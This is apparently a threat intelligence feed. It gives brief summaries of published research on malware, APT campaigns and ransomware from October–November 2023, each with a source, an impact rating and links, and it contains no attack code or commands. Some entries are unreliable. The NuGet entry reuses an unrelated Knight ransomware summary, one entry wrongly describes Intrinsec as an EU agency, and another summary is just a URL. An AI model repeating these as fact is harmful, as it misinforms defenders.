- Researchers from Palo Alto have discovered harmful Chinese APT infrastructure that poses as cloud backup services. They saw network connections mostly coming from Cambodia while keeping an eye on telemetry linked to two well-known Chinese APT groups. These connections included inbound connections coming from at least 24 government entities in Cambodia.
Source:
https://unit42.paloaltonetworks.com/chinese-apt-linked-to-cambodia-government-attacks/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Project_File_Example_for_Phishing_Campaign
- Date of Scan:
- 2023-11-09
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have discovered a fascinating file on VT. Because the file included a reference to one of their customers’ domains, it set off one of their hunting rules. They looked at the “EwoExcel (1).mmp” file. Though it was made in 2022, the file was just uploaded to VT. These kinds of papers are handled using a program known as “GammaDyne.” The program can work with the file and extract its secrets. It includes information on a well-known phishing campaign initiative.
Source:
https://isc.sans.edu/diary/Example+of+Phishing+Campaign+Project+File/30384
—
- Intel Source:
- Krebsonsecurity
- Intel Name:
- SWAT_USA_Drop_Service_Exposed
- Date of Scan:
- 2023-11-08
- Impact:
- LOW
- Summary:
- Researchers from KrebsonSecurity have identified SWAT USA Drop Service. Based in Russia, this organization employs more than 1,200 individuals across the United States to reship stolen merchandise acquired with pilfered credit card information.
Source:
https://krebsonsecurity.com/2023/11/russian-reshipping-service-swat-usa-drop-exposed/
—
- Intel Source:
- SOC Radar
- Intel Name:
- New_Gootloader_Variant_GootBot
- Date of Scan:
- 2023-11-08
- Impact:
- LOW
- Summary:
- SOCRadar researchers have discovered a new Gootloader malware version called “GootBot,” which is utilized in SEO poisoning campaigns. This version adds capabilities that make it harder for enterprises to identify or stop threat actors from moving laterally within compromised systems.
Source:
https://socradar.io/new-gootloader-variant-gootbot-changes-the-game-in-malware-tactics/
—
- Intel Source:
- Esentire
- Intel Name:
- An_infection_by_the_NetWire_RAT
- Date of Scan:
- 2023-11-08
- Impact:
- LOW
- Summary:
- In September 2023, the eSentire Threat reserachers discovered and prevented an infection by the NetWire RAT. NetWire is a publicly available remote administration tool which steals password-stealing and keylogging capabilities.
Source:
https://www.esentire.com/blog/netwire-rat-the-stealthy-invasion-via-frenchy-shellcode
—
- Intel Source:
- Uptycs
- Intel Name:
- From_Combating_ISIS_to_Potentially_Using_RaaS_to_Target_Israel
- Date of Scan:
- 2023-11-08
- Impact:
- LOW
- Summary:
- GhostLocker, a novel ransomware-as-a-service (RaaS) infrastructure, was disclosed by the hacking organization GhostSec. Through a dedicated Telegram channel, they offer consumers interested in purchasing this service extensive guidance. GhostSec is currently concentrating its attacks on Israel. This action is an unexpected divergence from their prior endeavors and declared goals.
Source:
https://www.uptycs.com/blog/ghostlocker-ransomware-ghostsec
—
- Intel Source:
- Cyfirma
- Intel Name:
- A_new_threat_the_Millenium_RAT_details
- Date of Scan:
- 2023-11-08
- Impact:
- LOW
- Summary:
- Cyfirma team observed a new RAT on GitHub, available for purchase. The analysts shared their in-depth investigation report of the Millenium-RAT, version 2.4; a Win32 executable built on .NET. At hte same time, the RAT is actively under development, with a new version, 2.5, just released.
Source:
https://www.cyfirma.com/outofband/unveiling-a-new-threat-the-millenium-rat/
—
- Intel Source:
- Esentire
- Intel Name:
- A_Journey_From_DarkGate_to_DanaBot
- Date of Scan:
- 2023-11-08
- Impact:
- LOW
- Summary:
- Early in June 2023, a Russian-speaking hacking site first advertised the sale of DarkGate, a loader developed in Borland Delphi. According to the loader developer, they started working on the project in 2017. Among the many functions offered by DarkGate are hVNC, hAnyDesk, rootkit, reverse proxy, keylogger, crypto mining, credentials theft, and remote desktop. The cost of the loader is $1,000 for a single use and $15,000 for recurring use.
Source:
https://www.esentire.com/blog/from-darkgate-to-danabot
—
- Intel Source:
- Jamf, Security Week
- Intel Name:
- New_macOS_malware_used_by_North_Korean_hackers
- Date of Scan:
- 2023-11-08
- Impact:
- MEDIUM
- Summary:
- A new macOS malware was sispicious to be used by North Korean hackers to target crypto exchanges submitted by security firm Jamf. The group is responsible for the malware is suspected to be the same group behind the recently reported KandyKorn malware.
Source:
https://www.jamf.com/blog/bluenoroff-strikes-again-with-new-macos-malware/
https://www.securityweek.com/new-macos-malware-linked-to-north-korean-hackers/
—
- Intel Source:
- nccgroup
- Intel Name:
- A_deeper_dive_into_the_D0nut_extortion_group
- Date of Scan:
- 2023-11-08
- Impact:
- LOW
- Summary:
- NCC Group took a deeper look at the D0nut extortion group. The D0nut extortion group was first have seen last year for breaking in the networks and demanding money in return for not leaking stolen data. There is also suspected ties between D0nut affiliates and both Hive and Ragnar Locker ransomware operations.
Source:
https://research.nccgroup.com/2023/11/06/d0nut-encrypt-me-i-have-a-wife-and-no-backups/
—
- Intel Source:
- Cyfirma
- Intel Name:
- Good_Day_ransomware_of_the_week
- Date of Scan:
- 2023-11-07
- Impact:
- MEDIUM
- Summary:
- CYFIRMA researchers has dicovered ransomware known as Good Day ransomware while monitoring various underground forums as part of our Threat Discovery Process.
Source:
https://www.cyfirma.com/news/weekly-intelligence-report-03-nov-2023/
—
- Intel Source:
- Seqrite
- Intel Name:
- SideCopy_s_multi_platform_attacks
- Date of Scan:
- 2023-11-07
- Impact:
- MEDIUM
- Summary:
- SEQRITE Labs APT-Team has observed multiple campaigns of APT SideCopy, attacking Indian government and defense entities last couple months. The threat group is now exploiting the recent WinRAR vulnerability CVE-2023-38831 to deploy AllaKore RAT, DRat and additional payloads.
—
- Intel Source:
- HC3
- Intel Name:
- An_Overview_of_BlackSuit_Ransomware
- Date of Scan:
- 2023-11-07
- Impact:
- MEDIUM
- Summary:
- Given its striking resemblance to the Royal ransomware family, BlackSuit, a relatively new ransomware group and strain, is expected to pose a serious danger to the Healthcare and Public Health (HPH) industry. Sensitive data on a vulnerable network is stolen and encrypted by BlackSuit utilizing a double extortion technique. It has only been used specifically in a few instances thus far.
Source:
https://www.hhs.gov/sites/default/files/blacksuit-ransomware-analyst-note-tlpclear.pdf
—
- Intel Source:
- PaloAlto
- Intel Name:
- Agonizing_Serpens_attacks_on_the_Israeli_organizations
- Date of Scan:
- 2023-11-07
- Impact:
- MEDIUM
- Summary:
- Unit 42 researchers have analyzed recent attacks last month which targeting the education and technology sectors in Israel. The attacks are attempting to steal sensitive data, such as personally identifiable information (PII) and intellectual property. Unit 42’s investigation showed the perpetrators of the attacks have linked to an Iranian-backed APT group Unit 42 tracks as Agonizing Serpens (aka Agrius, BlackShadow, Pink Sandstorm, DEV-0022).
Source:
https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/
—
- Intel Source:
- VMware
- Intel Name:
- A_Jupyter_Infostealer_Update
- Date of Scan:
- 2023-11-07
- Impact:
- MEDIUM
- Summary:
- New Jupyter Infostealer iterations persist in developing, incorporating minor yet significant modifications to the malware creator’s methods. With this innovation, the attacker can more covertly compromise victims by avoiding detection and establishing persistence.
Source:
https://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_open_source_stealer_named_Trap_Stealer
- Date of Scan:
- 2023-11-07
- Impact:
- LOW
- Summary:
- Cyble researchers shared their deep insights about a new info stealer known as “Trap Stealer” – an open-source Python-based program. The developer of this stealer claims that it is designed to extract a wide range of sensitive data from compromised systems in just 6 seconds.
Source:
https://cyble.com/blog/new-open-source-trap-stealer-pilfers-data-in-just-6-seconds/
—
- Intel Source:
- Security Intelligence
- Intel Name:
- Hive0051s_Large_Scale_Malicious_Operations
- Date of Scan:
- 2023-11-07
- Impact:
- MEDIUM
- Summary:
- Last month, IBM X-Force has started to see a huge spike in Hive0051’s activity with the new multi-channel approach of rapidly rotating C2 infrastructure infecting at least 1,027 active infections featuring more than 327 unusual malicious domains observed in a 24-hour period.
Source:
https://securityintelligence.com/x-force/hive0051-malicious-operations-enabled-dns-fluxing/
—
- Intel Source:
- Intezer
- Intel Name:
- Malicious_PDF_files_analysis
- Date of Scan:
- 2023-11-07
- Impact:
- LOW
- Summary:
- Intezer analysts described in their article about the PDF format and how it can be abused to deliver malware. Then they showed how people can identify and detect a malicious PDF file using open-source and free tools.
Source:
https://intezer.com/blog/incident-response/analyze-malicious-pdf-files/
—
- Intel Source:
- Aquasec
- Intel Name:
- Kinsing_Actors_Breach_Cloud_Environments_by_Using_New_Linux_Flaw
- Date of Scan:
- 2023-11-06
- Impact:
- LOW
- Summary:
- Aqua Nautilus researchers have effectively stopped Kinsing’s experimental forays into cloud regions. As part of Kinsing’s continuous campaign, they are using a basic yet common PHPUnit vulnerability exploit attack to discover the threat actor’s manual attempts to alter the Looney Tunables vulnerability (CVE-2023-4911).
Source:
https://blog.aquasec.com/loony-tunables-vulnerability-exploited-by-kinsing
—
- Intel Source:
- McAfee
- Intel Name:
- Revealing_the_AsyncRAT_New_Infection_Network
- Date of Scan:
- 2023-11-06
- Impact:
- LOW
- Summary:
- Researchers at McAfee have seen that a malicious HTML file is being used to spread a recent AsyncRAT campaign. VBScript (VBS), Windows Script File (WSF), PowerShell, and other file formats are used throughout this entire infection method to evade antivirus detection.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/unmasking-asyncrat-new-infection-chain/
—
- Intel Source:
- BitSight
- Intel Name:
- Exposing_Socks5Systemz
- Date of Scan:
- 2023-11-03
- Impact:
- LOW
- Summary:
- Researchers from Bitsight have discovered a proxy botnet that is being delivered using two loaders that threat actors commonly use to spread malware and construct botnets: PrivateLoader and Amadey. The malware known as a proxy bot has been dubbed Socks5Systemz, which is also the name of the special login window that is always present in all of the current C2 proxy bots.
—
- Intel Source:
- HC3
- Intel Name:
- Analyzing_the_8Base_Ransomware_Threat
- Date of Scan:
- 2023-11-03
- Impact:
- MEDIUM
- Summary:
- The “8Base Ransomware Threat Analysis – HC3 Analyst Note” is a report from the U.S. Department of Health and Human Services (HHS). It discusses the emerging threat posed by the 8Base ransomware gang, focusing on its recent activities in the Healthcare and Public Health (HPH) sector.
Source:
https://www.hhs.gov/sites/default/files/8base-ransomware-analyst-note.pdf
—
- Intel Source:
- Cyble
- Intel Name:
- New_Java_Based_Sayler_RAT_Targeting_Polish_Speaking_Users
- Date of Scan:
- 2023-11-03
- Impact:
- LOW
- Summary:
- Researchers from Cyble discovered a Java Archive (JAR) file on VirusTotal that had zero detections. After further investigation, they were able to identify the file as a Remote Access Trojan (RAT), which they named “Sayler.”
Source:
https://cyble.com/blog/new-java-based-sayler-rat-targets-polish-speaking-users/
—
- Intel Source:
- NCC Group
- Intel Name:
- A_Synopsis_of_Blisters_Malware
- Date of Scan:
- 2023-11-03
- Impact:
- LOW
- Summary:
- In the past, Blister a loader with an integrated payload was seen engaging in activities connected to Evil Corp. Researchers have also viewed it as a follow-up in SocGholish infections, in line with public reporting. Previously, they saw Blister mostly dropping Cobalt Strike beacons, but recent events indicate a change to Mythic agents, an additional red teaming structure.
—
- Intel Source:
- Netskope
- Intel Name:
- A_Novel_Loading_Method_Employed_by_New_DarkGate_Variant
- Date of Scan:
- 2023-11-03
- Impact:
- LOW
- Summary:
- Recently, a new DarkGate variant distributed via MSI that uses a loading technique based on the default shellcode stub of Cobalt Strike Beacon was discovered by Netskope Threat Labs. By comparing the results of their analysis with those of other researchers, they were able to conclude that this is a new variant of the DarkGate malware.
Source:
https://www.netskope.com/jp/blog/new-darkgate-variant-uses-a-new-loading-approach
—
- Intel Source:
- Ciberdefensa, ASEC
- Intel Name:
- An_Infostealer_actively_being_distributed
- Date of Scan:
- 2023-11-02
- Impact:
- MEDIUM
- Summary:
- This article warns against the malicious behavior of the LummaC2 infostealer, which is distributed by executing legitimate EXE files with malicious DLLs disguised as cracks and keygens. It provides IOC information, C2 information, and encourages readers to subscribe to AhnLab’s TIP platform for further analysis.
Source:
https://ciberdefensa.cat/archivos/28455
https://asec.ahnlab.com/en/58319/
—
- Intel Source:
- ASEC
- Intel Name:
- Malicious_HWP_documents_with_embedded_OLE_object
- Date of Scan:
- 2023-11-02
- Impact:
- LOW
- Summary:
- ASEC found malicious HWP documents embedded with OLE objects targeting individuals in specific sectors. The documents prompt users to click the OLE object, which contains a malicious URL. The second type of HWP document has a malicious script file embedded, which executes an additional script code from GitHub. When executed, files zz.bat and oz.txt are created, which contain PowerShell commands to download and execute data from GitHub.
—
- Intel Source:
- Deep Instinct
- Intel Name:
- Iran_Group_MuddyWater_Targeting_Israel
- Date of Scan:
- 2023-11-02
- Impact:
- MEDIUM
- Summary:
- A fresh spear-phishing campaign targeting two Israeli businesses has been connected to the Iranian nation-state actor MuddyWater. The campaign’s ultimate goal is to deliver Advanced Monitoring Agent, a genuine remote administration tool from N-able.
Source:
https://www.deepinstinct.com/blog/muddywater-en-able-spear-phishing-with-new-ttps
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_upgraded_variant_of_Kazuar
- Date of Scan:
- 2023-11-02
- Impact:
- LOW
- Summary:
- Kazuar is a .NET backdoor used by Pensive Ursa as a second stage payload. It has robust code and string obfuscation techniques, a multithreaded model for enhanced performance, and a range of encryption schemes to protect its code from analysis and to conceal its data. It supports over 40 distinct commands, half of which were previously undocumented, and has anti-analysis functionalities, extensive system profiling capabilities, and is specifically targeted at cloud applications. Cortex XDR can detect and prevent the execution of Kazuar.
Source:
https://unit42.paloaltonetworks.com/pensive-ursa-uses-upgraded-kazuar-backdoor/
—
- Intel Source:
- Rapid7
- Intel Name:
- Ransomware_Group_HelloKitty_Exploiting_Apache_ActiveMQ_Vulnerability
- Date of Scan:
- 2023-11-02
- Impact:
- LOW
- Summary:
- Rapid7 researchers have issued a warning regarding the potential for remote code execution in the event that a recently discovered severe security hole in the Apache ActiveMQ open-source message broker service is exploited.
—
- Intel Source:
- Elastic
- Intel Name:
- The_DPRK_infects_blockchain_engineers_with_new_macOS_malware
- Date of Scan:
- 2023-11-01
- Impact:
- LOW
- Summary:
- The article describes the malicious code KANDYKORN used by the Lazarus Group to access and exfiltrate data from victims’ computers. It utilizes reflective loading and encrypted RC4 protocol to communicate with the C2 server. It also provides EQL queries, YARA rules, and observables related to the SUGARLOADER, HLOADER, and KANDYKORN payloads.
Source:
https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn
—
- Intel Source:
- Reversing Labs
- Intel Name:
- NuGet_expose_to_malicious_activities_by_threat_actors
- Date of Scan:
- 2023-11-01
- Impact:
- MEDIUM
- Summary:
- This article provides information on the Knight ransomware dropper location, its infection vector, victimology, and data leak site. It also outlines Fortinet’s protections and Indicators of Compromise (IOCs), as well as its services to help organizations protect themselves from ransomware attacks, such as the FortiPhish Phishing Simulation Service and NSE 1 – Information Security Awareness training module. Additionally, it advises against paying a ransom and outlines Fortinet’s Emergency Incident Response Service, Incident Readiness Subscription Service, and FortiRecon Digital Risk Protection (DRP).
Source:
https://www.reversinglabs.com/blog/iamreboot-malicious-nuget-packages-exploit-msbuild-loophole
—
- Intel Source:
- Palo Alto
- Intel Name:
- Monitoring_Malicious_Activities_Using_Revealed_IAM_Keys
- Date of Scan:
- 2023-11-01
- Impact:
- MEDIUM
- Summary:
- In an attempt to aid cryptojacking activities, a new ongoing campaign known as EleKtra-Leak is focusing on exposed identity and access management (IAM) credentials from Amazon Web Services (AWS) inside open GitHub projects.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- The_discovery_of_a_kill_switch_that_took_down_a_botnet
- Date of Scan:
- 2023-11-01
- Impact:
- LOW
- Summary:
- https://www.welivesecurity.com/en/eset-research/who-killed-mozi-finally-putting-the-iot-zombie-botnet-in-its-grave/
—
- Intel Source:
- Fortinet
- Intel Name:
- Knight_Ransomware_activity
- Date of Scan:
- 2023-11-01
- Impact:
- MEDIUM
- Summary:
- This article provides information on the Knight ransomware dropper location, its infection vector, victimology, and data leak site. It also outlines Fortinet’s protections and Indicators of Compromise (IOCs), as well as its services to help organizations protect themselves from ransomware attacks, such as the FortiPhish Phishing Simulation Service and NSE 1 – Information Security Awareness training module. Additionally, it advises against paying a ransom and outlines Fortinet’s Emergency Incident Response Service, Incident Readiness Subscription Service, and FortiRecon Digital Risk Protection (DRP).
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-knight
—
- Intel Source:
- Talos
- Intel Name:
- The_estimate_of_cyber_attacks_cost
- Date of Scan:
- 2023-11-01
- Impact:
- LOW
- Summary:
- This article discusses the potential for estimates of cyber attack costs to create fear, uncertainty, and doubt (FUD) in the cybersecurity space. Instead of focusing on these estimates, the author suggests focusing on ways to get easy cybersecurity wins. It also provides an overview of the YoroTrooper threat actor, security headlines, upcoming events, and a list of the most prevalent malware files from Talos telemetry.
Source:
https://blog.talosintelligence.com/threat-source-newsletter-oct-26-2023/
—
- Intel Source:
- Checkpoint
- Intel Name:
- An_ongoing_Iranian_espionage_campaign_by_Scarred_Manticore
- Date of Scan:
- 2023-11-01
- Impact:
- LOW
- Summary:
- Scarred Manticore is an Iranian nation-state threat actor that deploys LIONTAIL, a backdoor, and other custom components to target government, telecommunications, military, and financial sectors in the Middle East. LIONTAIL utilizes the Windows HTTP Stack to register URL prefixes and receive requests, and uses XOR-based encryption to protect data. It also uses the WINTAPIX driver to inject shellcode into processes and execute .NET assemblies from memory.
—
- Intel Source:
- Security Joes
- Intel Name:
- BiBi_Linux_a_new_wiper
- Date of Scan:
- 2023-10-31
- Impact:
- MEDIUM
- Summary:
- Security Joes analysts had the forensics investigation and found what appears to be a new Linux Wiper malware we track as BiBi-Linux Wiper.This malware is an x64 ELF executable, lacking obfuscation or protective measures. It allows attackers to specify target folders and can potentially destroy an entire operating system if run with root permissions.
Source:
https://www.securityjoes.com/post/bibi-linux-a-new-wiper-dropped-by-pro-hamas-hacktivist-group
—
- Intel Source:
- Proofpoint
- Intel Name:
- IcedID_Forked_Loader_Delivered_by_TA571
- Date of Scan:
- 2023-10-31
- Impact:
- LOW
- Summary:
- Researchers at Proofpoint have discovered that on October 11 and 18, 2023, TA571 delivered the Forked variation of IcedID in two campaigns. Each of the two campaigns’ more than 6,000 messages reached more than 1,200 clients worldwide across numerous industries. The campaigns’ emails claimed to be responses to already-existing discussions. Thread hijacking is the term for this. The emails had 404 TDS URLs that led to the download of a zip file that required a password, which was provided in the email. Before sending the zip archive, the attack chain contained a number of tests to make sure the recipient was legitimate
Source:
https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta571-delivers-icedid-forked-loader
—
- Intel Source:
- Sucuri
- Intel Name:
- Fake_Google_chrome_update_malware
- Date of Scan:
- 2023-10-30
- Impact:
- LOW
- Summary:
- Fake Google Chrome update malware, associated with SocGholish, tricks users into downloading a RAT. Attackers modify the official download page, and malicious JavaScript code triggers a malicious download when the “Update” button is clicked. The malware belongs to the Zgrat and Redline Stealer families. Website owners should patch plugins/themes, secure/harden WordPress, and keep backups to protect against this malware.
Source:
https://blog.sucuri.net/2023/10/fakeupdateru-chrome-update-infection-spreads-trojan-malware.html
—
- Intel Source:
- Zscaler
- Intel Name:
- A_Look_Back_at_AvosLocker
- Date of Scan:
- 2023-10-30
- Impact:
- LOW
- Summary:
- According to Zscaler analysts’ analysis, AvosLocker is a ransomware group that was operational up to May 2023, carrying out double extortion attacks. The organization used various ransomware strains to attack multiple operating systems.
Source:
https://www.zscaler.com/blogs/security-research/retrospective-avoslocker
—
- Intel Source:
- CERT SSI
- Intel Name:
- Numerous_Critical_Networks_Breached_by_Russian_State_Hackers
- Date of Scan:
- 2023-10-30
- Impact:
- MEDIUM
- Summary:
- Since the second part of 2021, the Russian hacking group APT28 (also known as “Strontium” or “Fancy Bear”) has been focusing on French government agencies, corporations, academic institutions, research centers, and think tanks. The attack group was recently connected to the exploitation of two vulnerabilities: CVE-2023-23397, a zero-day privilege elevation weakness in Microsoft Outlook, and CVE-2023-38831, a remote code execution vulnerability in WinRAR. The threat group is thought to be a part of Russia’s military intelligence service GRU.
Source:
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf
—
- Intel Source:
- The DFIR Report
- Intel Name:
- Invasions_by_Netsupport_Result_in_Domain_Compromises
- Date of Scan:
- 2023-10-30
- Impact:
- LOW
- Summary:
- Researchers from the DFIR Report examined a January 2023 case in which a network was compromised using a NetSupport RAT. After that, a full domain breach was achieved through the usage of the RAT for persistence and command and control.
Source:
https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Dynamic_Search_Ads_Delivering_Malware
- Date of Scan:
- 2023-10-30
- Impact:
- LOW
- Summary:
- Researchers at Malwarebytes have examined an other situation in which, bizarre as it may seem, malvertising is completely unintentional. This is the result of two distinct elements coming together: Google Dynamic Search Ads and a hijacked website.
—
- Intel Source:
- ASEC
- Intel Name:
- Remcos_RAT_Distribution_Clad_in_Payslip
- Date of Scan:
- 2023-10-30
- Impact:
- LOW
- Summary:
- Researchers from ASEC have uncovered instances when the Remcos remote control virus is disseminated using emails that look like paystubs.
—
- Intel Source:
- Elastic
- Intel Name:
- Hackers_Infect_Windows_Systems_with_MSIX_App_Packages
- Date of Scan:
- 2023-10-30
- Impact:
- MEDIUM
- Summary:
- A fresh cyberattack operation has been noticed that distributes a unique malware loader known as GHOSTPULSE by employing phony MSIX Windows app package files for widely used programs like Google Chrome, Microsoft Edge, Brave, Grammarly, and Cisco Webex.
Source:
https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks
—
- Intel Source:
- Securelist
- Intel Name:
- Introducing_Lazarus_New_Campaign
- Date of Scan:
- 2023-10-27
- Impact:
- MEDIUM
- Summary:
- Researchers at Securelist have found that the company that created the compromised software has already been repeatedly hacked by Lazarus. This repeated breach indicated a persistent and determined threat actor that continued to target additional software developers while exploiting weaknesses in the company’s software, most likely with the intention of obtaining important source code or interfering with the software supply chain.
Source:
https://securelist.com/unveiling-lazarus-new-campaign/110888/
—
- Intel Source:
- Cyble
- Intel Name:
- The_Higaisa_APT_group_targeting_Chinese_users
- Date of Scan:
- 2023-10-27
- Impact:
- LOW
- Summary:
- Cyble researchers has observed a new APT campaign targeting on tricking unsuspecting victims through phishing and coping well known computer applications. This time, a phishing website was observed pretending as OpenVPN software made up for Chinese users and serves as a host to deliver the malicious payload.
Source:
https://cyble.com/blog/higaisa-apt-resurfaces-via-phishing-website-targeting-chinese-users/
—
- Intel Source:
- Securelist
- Intel Name:
- StripedFly_exploit
- Date of Scan:
- 2023-10-27
- Impact:
- LOW
- Summary:
- Securelist observed and detailed out another cryptocurrency miner. This StripedFly exploit masked behind modular framework that supports both Linux and Windows. It comes together with a built-in TOR network tunnel for communication with command servers, along with update and delivery functionality through trusted services such as GitLab, GitHub, and Bitbucket, all using custom encrypted archives.
Source:
https://securelist.com/stripedfly-perennially-flying-under-the-radar/110903/
—
- Intel Source:
- Zscaler
- Intel Name:
- The_Mystic_Stealer_Returns
- Date of Scan:
- 2023-10-26
- Impact:
- LOW
- Summary:
- Early in 2023, the downloader and information stealer known as Mystic Stealer made its appearance. A multitude of web browsers and cryptocurrency wallet applications are used by the spyware to gather data.
—
- Intel Source:
- PWC
- Intel Name:
- Iranian_Group_Tortoiseshell_Using_IMAPLoader_Malware
- Date of Scan:
- 2023-10-26
- Impact:
- MEDIUM
- Summary:
- A new wave of watering hole attacks that are intended to release a malware called IMAPLoader has been linked to the Iranian threat actor Tortoiseshell. “IMAPLoader is a.NET malware that has the ability to fingerprint victim systems using native Windows utilities and acts as a downloader for further payloads,” the statement reads.
—
- Intel Source:
- Cluster25
- Intel Name:
- LinkedIn_Based_Identity_Theft_Campaign_Leveraging_DuckTail_Malware
- Date of Scan:
- 2023-10-26
- Impact:
- LOW
- Summary:
- A recent campaign exploits compromised LinkedIn accounts to target Italian technology professionals, primarily in sales and finance roles. Attackers use LinkedIn messages to distribute fraudulent job offers with embedded malicious links that lead to phishing sites and deliver DuckTail malware. This malware steals browser data, including cookies and credentials, which are exfiltrated through a Telegram bot. The malware also facilitates Facebook Business hijacking.
Source:
https://blog.cluster25.duskrise.com/2023/10/25/the-duck-is-hiring
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- The_Winter_Vivern_cyberespionage_operations
- Date of Scan:
- 2023-10-26
- Impact:
- LOW
- Summary:
- ESET researchers have been monitoring the operations of Winter Vivern for a long time and recently that the threat actors started exploiting a zero-day XSS vulnerability in the Roundcube Webmail server in the beginning of October, 2023. ESET telemetry data showed the campaign’s target is Roundcube Webmail servers belonging to governmental entities and a think tank, all in Europe
—
- Intel Source:
- Netscope
- Intel Name:
- Menorah_malware_details
- Date of Scan:
- 2023-10-26
- Impact:
- LOW
- Summary:
- This month, Netskope analysts investigated a suspicious Word document that had malware it contained, dubbed “Menorah.” The malware was linked to the threat group APT34, and distributed via spear-phishing. The malicious Office file uses spread and obfuscated VBA code to evade detection.
Source:
https://www.netskope.com/blog/netskope-threat-coverage-menorah
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Malvertising_campaigns_for_WhatsApp_and_Telegram
- Date of Scan:
- 2023-10-25
- Impact:
- LOW
- Summary:
- Malwarebytes did research and investigation on an increase in malicious webpages for the WhatsApp communication tool, driven via malicious Google ads. The suspicious sites they saw had similar page than the web version of WhatsApp to trick victims into scanning a QR code to link their new device. Alco, the researchers discovered another campaign using an ad for messaging tool Telegram, to lure victims into downloading a malicious version of the program. Again, this attack was targeted at residents of Hong Kong.
—
- Intel Source:
- Antiy CERT
- Intel Name:
- Active_WatchDog_mining_organization_samples_analyses
- Date of Scan:
- 2023-10-25
- Impact:
- MEDIUM
- Summary:
- This month, Antiy CERT got some active WatchDog mining organization samples. This organization mainly uses exposed Docker Engine API endpoints and Redis servers to attack and can quickly move from an infected machine to the entire network. The WatchDog mining organization started their activity in January 2019 and is still active today.
Source:
https://www.antiy.cn/research/notice&report/research_report/WatchDogTrojans_Analysis.html
—
- Intel Source:
- Talos
- Intel Name:
- Kazakhstan_associated_YoroTrooper_operators
- Date of Scan:
- 2023-10-25
- Impact:
- LOW
- Summary:
- Talos discovered and made a desicion that YoroTrooper operators are based in Kazakhstan based on their language use, use of Kazakhstani currency, which only included the government’s Anti-Corruption Agency.
Source:
https://blog.talosintelligence.com/attributing-yorotrooper/
—
- Intel Source:
- The Hackers News
- Intel Name:
- North_Korean_IT_Scammers_Defrauding_Global_Businesses
- Date of Scan:
- 2023-10-25
- Impact:
- MEDIUM
- Summary:
- The Republic of Korea and the U.S. posted about their seizure of 17 website domains used by North Korean information technology (IT) workers as part of an illigal scheme to defraud businesses across the world, evade sanctions, and fund the country’s ballistic missile program.
Source:
https://thehackernews.com/2023/10/us-doj-cracks-down-on-north-korean-it_20.html
—
- Intel Source:
- Securelist
- Intel Name:
- Attacks_on_Russian_Federation_Government_And_Industrial_Sectors
- Date of Scan:
- 2023-10-25
- Impact:
- MEDIUM
- Summary:
- Data theft is the goal of several harmful programs that researchers have found. They can presume that the attackers’ primary objective is to steal data from companies in these industries because Kaspersky Threat Intelligence reports that similar programs have been discovered in a number of other government and industrial entities in the Russian Federation.
Source:
https://securelist.ru/ataki-na-industrialnyj-i-gosudarstvennyj-sektory-rf/108229/
—
- Intel Source:
- Cert.Pl
- Intel Name:
- Deworming_the_XWorm_malware
- Date of Scan:
- 2023-10-24
- Impact:
- LOW
- Summary:
- Cert. Pl shared their post wit a detailed analysis and walk-through the reverse-engineering process of a malware family called XWorm. XWorm is a multi-purpose malware family, commonly used as RAT.
Source:
https://cert.pl/en/posts/2023/10/deworming-the-xworm/
—
- Intel Source:
- Gdatasoftware
- Intel Name:
- Facebook_malicious_Ads
- Date of Scan:
- 2023-10-24
- Impact:
- LOW
- Summary:
- Threat actors take advantage of business accounts on Facebook and run their own advertising campaigns in someone else’s name and at the expense of those affected. Gdatasoftware shared their analysis and a closer look at one such case here.
Source:
https://www.gdatasoftware.com/blog/2023/10/37814-meta-hijacked-malicious-ads
—
- Intel Source:
- Securityscorecard
- Intel Name:
- Deep_analysis_of_Cactus_ransomware
- Date of Scan:
- 2023-10-24
- Impact:
- LOW
- Summary:
- Security ScoreCard researchers shared their detailed analysis about Cactus Ransomware which was first discovered in March 2023. The malware creates a mutex called “b4kr-xr7h-qcps-omu3cAcTuS” to ensure that only one copy is running at a time. Persistence is achieved by creating a scheduled task named “Updates Check Task”. The ransomware requires an AES key to decrypt the encrypted public RSA key stored in the binary.
Source:
https://securityscorecard.com/research/deep-dive-into-cactus-ransomware/
—
- Intel Source:
- Securelist
- Intel Name:
- New_Lumar_stealer_and_Rhysida_ransomware
- Date of Scan:
- 2023-10-24
- Impact:
- MEDIUM
- Summary:
- Securelist analyzed the details on malware that has been active this year: the GoPIX stealer that attacks the PIX payment system, which is popular in Brazil; the Lumar multipurpose stealer advertised on the dark web; and the Rhysida ransomware supporting old Windows versions.
Source:
https://securelist.com/crimeware-report-gopix-lumar-rhysida/110871/
—
- Intel Source:
- Any Run
- Intel Name:
- The_use_of_Steganography_in_recent_malware_attacks
- Date of Scan:
- 2023-10-24
- Impact:
- LOW
- Summary:
- Any.Run analysts recently spotted a surge in the use of steganography method attacks in cyber attacks and shares the details of it in the blog. Steganography hides data within another file or medium, effectively making it invisible.
Source:
https://any.run/cybersecurity-blog/steganography-in-malware-attacks/
—
- Intel Source:
- Uptycs
- Intel Name:
- Quasar_RAT_Using_Side_Loading_DLL_Methods
- Date of Scan:
- 2023-10-23
- Impact:
- LOW
- Summary:
- To accomplish its goals, the Quasar RAT using a method called DLL side-loading, which entailed utilizing trusted Microsoft files like “calc.exe” and “ctfmon.exe.” This method makes use of the built-in trust that these files have in the Windows environment.
—
- Intel Source:
- Intrinsec
- Intel Name:
- Lumma_Stealer_multiple_campaigns
- Date of Scan:
- 2023-10-23
- Impact:
- MEDIUM
- Summary:
- A report on Lumma Stealer, a malware-as-a-service sold through Telegram and Russian-speaking forums, has been published by the European Union’s cyber security agency, Intrinsec.
—
- Intel Source:
